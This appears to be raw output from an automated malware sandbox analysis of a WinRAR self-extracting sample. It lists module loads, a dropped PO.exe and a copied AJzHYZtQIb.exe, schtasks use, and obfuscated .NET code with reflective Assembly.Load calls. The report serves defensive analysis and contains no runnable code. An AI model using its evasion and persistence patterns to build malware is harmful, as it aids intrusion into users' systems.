                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: dwrite.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: textshaping.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: slc.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: sppc.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: w4XFffGDz1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: w4XFffGDz1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: w4XFffGDz1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: w4XFffGDz1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: w4XFffGDz1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: w4XFffGDz1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: w4XFffGDz1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Source: w4XFffGDz1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb source: w4XFffGDz1.exe
                      Source: w4XFffGDz1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: w4XFffGDz1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: w4XFffGDz1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: w4XFffGDz1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: w4XFffGDz1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                      Data Obfuscation

                      barindex
                      Source: PO.exe.0.dr, MainForm.cs.Net Code: InitializeComponent
                      Source: AJzHYZtQIb.exe.7.dr, MainForm.cs.Net Code: InitializeComponent
                      Source: 7.2.PO.exe.29ee27c.0.raw.unpack, LoginForm.cs.Net Code: _206F_206A_200D_200E_206C_200D_200E_206E_202D_200F_202D_206D_200D_206C_206C_206D_200C_202B_200C_202D_202A_200B_202B_202E_206E_202C_202E_202D_200E_200E_200D_202A_206F_200F_206B_206A_200E_200E_206B_202B_202E System.Reflection.Assembly.Load(byte[])
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, EjNspf9tdXyKYSqTEN.cs.Net Code: PFORYJkYX8 System.Reflection.Assembly.Load(byte[])
                      Source: 7.2.PO.exe.7770000.7.raw.unpack, LoginForm.cs.Net Code: _206F_206A_200D_200E_206C_200D_200E_206E_202D_200F_202D_206D_200D_206C_206C_206D_200C_202B_200C_202D_202A_200B_202B_202E_206E_202C_202E_202D_200E_200E_200D_202A_206F_200F_206B_206A_200E_200E_206B_202B_202E System.Reflection.Assembly.Load(byte[])
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, EjNspf9tdXyKYSqTEN.cs.Net Code: PFORYJkYX8 System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_6362281Jump to behavior
                      Source: w4XFffGDz1.exeStatic PE information: section name: .didat
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0018C403 push ecx; ret 0_2_0018C416
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0018D4B0 push ecx; ret 0_2_0018D4C3
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 14_2_0697E5CF push es; ret 14_2_0697E5E0
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_07AA9695 push FFFFFF8Bh; iretd 16_2_07AA9697
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 16_2_08D48D0B push esp; retf 16_2_08D48D0D
                      Source: PO.exe.0.drStatic PE information: section name: .text entropy: 7.616094055788291
                      Source: AJzHYZtQIb.exe.7.drStatic PE information: section name: .text entropy: 7.616094055788291
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, vDrWgAuv05qGryjBLgI.csHigh entropy of concatenated method names: 'DLaFo6BeZC', 'Ub7FfGRIXv', 'nPFFYt388V', 'PFnFjKo1l8', 'Iq6F4UlDFo', 'KRVFVmgGIK', 'EXHFB125LY', 'odhFDtYdQ9', 'HFyFart8dd', 'boFFEaBFC0'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, p7yy0t7M82Hmx79AfL.csHigh entropy of concatenated method names: 'ToString', 'AI3i2Ye5u9', 'eXViKhcoox', 'EGBix93HrW', 'htBivmf4cA', 'C19iPp4DgV', 'jE2iWdmjCN', 'jWuiso0GQd', 'r5dih1ZFjl', 'PU3iIjMRc1'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, q72tq2ximplPDGFyoN.csHigh entropy of concatenated method names: 'Dispose', 'mBh9SJB4AZ', 'McfkKR4SMR', 'v9vGGDVhm2', 'V5h9LuFiD4', 'zXR9zpUKmf', 'ProcessDialogKey', 'iy2k7To6Ne', 'suAk9fVRd1', 'h46kkDn1FB'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, ocaowhuM8mELpeCg1ig.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dyiXO3HbNC', 'tOaX3e0s6A', 'zNTXTtyVJj', 'Wg3XHxl9G8', 'OldXq4nLC7', 'jmlXwBmRNZ', 'EByXAjdAcf'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, S4G9XnevepCQioK3is.csHigh entropy of concatenated method names: 'gJo0mD1FA8', 'Wf00esa51d', 'Np70psxPKI', 'QSfpLXWoJM', 'xldpz841qS', 'fey07QfJjq', 'FKs09HU5BQ', 'lRW0k0TFZp', 'qwL0QAhIZ6', 'Ugr0RBXEDK'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, IcmTCBLlejKLSTLxHH.csHigh entropy of concatenated method names: 'MnFyDDXJqe', 'spVyaZQs8b', 'eNwybjWRxo', 'YUpyKdriZm', 'VE9yvTNoIY', 'cuGyPf6pUQ', 'OMWysUqsZo', 'PaeyhkBu5B', 'tjEyt3v63H', 'ceky2apXsc'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, lBVadcz5bviu8jxc7G.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fIKFybUhyt', 'ecJFnqN7FM', 'DMRFiH00sR', 'YxPF8T4fFv', 'IQQF6FmN8T', 'l4IFFhlKWp', 'RykFX8kRuq'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, rmFfbhZkpQQsFEbfol.csHigh entropy of concatenated method names: 'xg28uXpVe7', 'lSZ8LFnhvR', 'E4V67DqmrM', 'P5N697nJAG', 'lp282GWP04', 'yQ28c7Svpc', 'bjL8NaoDwo', 'MqR8OCRYB2', 'JUY83QvBUt', 's5t8T7IZ1y'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, zFBqeEjRFBLSRfwf0A.csHigh entropy of concatenated method names: 'qxOejfA3UF', 'x5peVuiw3V', 'BS1eDvuyfX', 'STjeaHja4K', 'eUmenqTpVu', 'Hxneiia5DT', 'RNhe8yio7M', 'xPXe66C5Uw', 'eFKeFpmpi0', 'wofeXV8qNw'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, eQO0SCdvWMrQTMtdfV.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'jVJkSAUMS1', 'NBPkLvRnSg', 'Ynmkz7Ock1', 'MfgQ7bBfXa', 'vS5Q9jJpGF', 'lILQkLVw3w', 'FSWQQVusQF', 'LOsJ55H6jNVO98rOePI'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, qQX0XtkHmUSEBYI1Ue.csHigh entropy of concatenated method names: 'd47nt9aPHq', 'q4wnc6rLI6', 'pLdnOru2Gg', 'B2On3Umh45', 'jCRnKXc8gg', 'H4DnxbXsTH', 'VionvVpifN', 'KpcnPOjURp', 'ScKnWJpZSr', 'AUMnsutkql'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, Bvw1RBceaN523NPJik.csHigh entropy of concatenated method names: 'eh8g4JBoFl', 'KPngB7phcC', 'Qy3exQRQ33', 'x7kev7MRDM', 'vPNePS6O97', 'jTjeWDPYbL', 'hNQes18FWe', 'Bd2ehD06qa', 'gVOeIRMuDk', 'Ni5etIOdYt'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, oVpml5PMcJ46Alhh5x.csHigh entropy of concatenated method names: 'rOM0oSWLwa', 'lUO0fDbVS3', 'NoU0YPvSBT', 's380jZfgvB', 'EaJ04gjNVP', 'yOR0V8jBp9', 'E5w0BZhfFk', 'PjA0DILFEO', 'SYm0aCpivD', 'reg0Eu5fm2'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, j7TAQmhL1SaPlhQ8HW.csHigh entropy of concatenated method names: 'VehY7weF4', 'PS2jiyQ5G', 'ybXVcpZgC', 'nh7BWiih8', 'NL3aglGVm', 'oo6EYU8O8', 'bGiwGxE3sdtWaGs5BF', 'g27lJhXuICFEaPjkpn', 'g7Z6DgtCx', 'UDlXpC58O'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, EjNspf9tdXyKYSqTEN.csHigh entropy of concatenated method names: 'KEQQJ1GW36', 'xYfQmJ6P3E', 'OY4Q54DGMb', 't3EQenXMD3', 'hTAQgyARh1', 'rY6QprtFFR', 'NydQ0KCBHX', 'TT1QMFcZNp', 'YtpQ13dZMD', 'nNAQdAQV89'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, Xuy4Wt8IJKTSn2O2ZU.csHigh entropy of concatenated method names: 'HfK8dajagT', 'g9I8CtrjKW', 'ToString', 'eIG8mgevNb', 'NsD85Cohv7', 'Wti8efJQUs', 'YLx8gn01D4', 'E5A8pPH5JD', 'Vdg80bVeBs', 'sV38MeyE8Y'
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, LJTjbSmSH66JQvrsi3.csHigh entropy of concatenated method names: 'wOcpJ4iTCG', 'Sa2p5s9KLk', 'Ha7pgISe2Y', 'v8Qp0piEUB', 'VJwpMrlYIX', 'G4igqEGUKn', 'Oc6gwjnGoh', 'wrYgACx5nt', 'kSaguVGFlV', 'bPagS6Es0p'
